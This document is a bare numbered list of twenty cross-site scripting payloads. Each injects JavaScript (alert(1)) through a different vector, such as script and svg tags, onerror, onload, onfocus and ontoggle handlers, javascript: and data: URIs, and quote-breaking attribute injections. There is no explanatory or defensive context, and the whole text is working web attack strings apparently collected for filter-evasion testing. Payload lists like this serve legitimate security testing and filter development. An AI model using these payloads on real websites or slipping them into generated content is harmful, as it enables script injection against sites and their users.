1. <script>alert(1)</script>
2. <img src=x onerror=alert(1)>
3. <svg onload=alert(1)>
4. <body onload=alert(1)>
5. <iframe src="javascript:alert(1)">
6. <a href="javascript:alert(1)">click</a>
7. <input onfocus=alert(1) autofocus>
8. <details open ontoggle=alert(1)>
9. <marquee onstart=alert(1)>
10. "><script>alert(1)</script>
11. ' onmouseover=alert(1) '
12. <x onclick="alert(1)">click</x>
13. <div style="background:url('javascript:alert(1)')">
14. <object data="javascript:alert(1)">
15. <embed src="data:text/html,<script>alert(1)</script>">
16. <form action="javascript:alert(1)"><input type=submit>
17. <isindex action="javascript:alert(1)" type=image>
18. <xss style="background:url('javascript:alert(1)')">
19. <math><brute href="javascript:alert(1)">click</brute></math>
20. <video><source onerror="javascript:alert(1)">
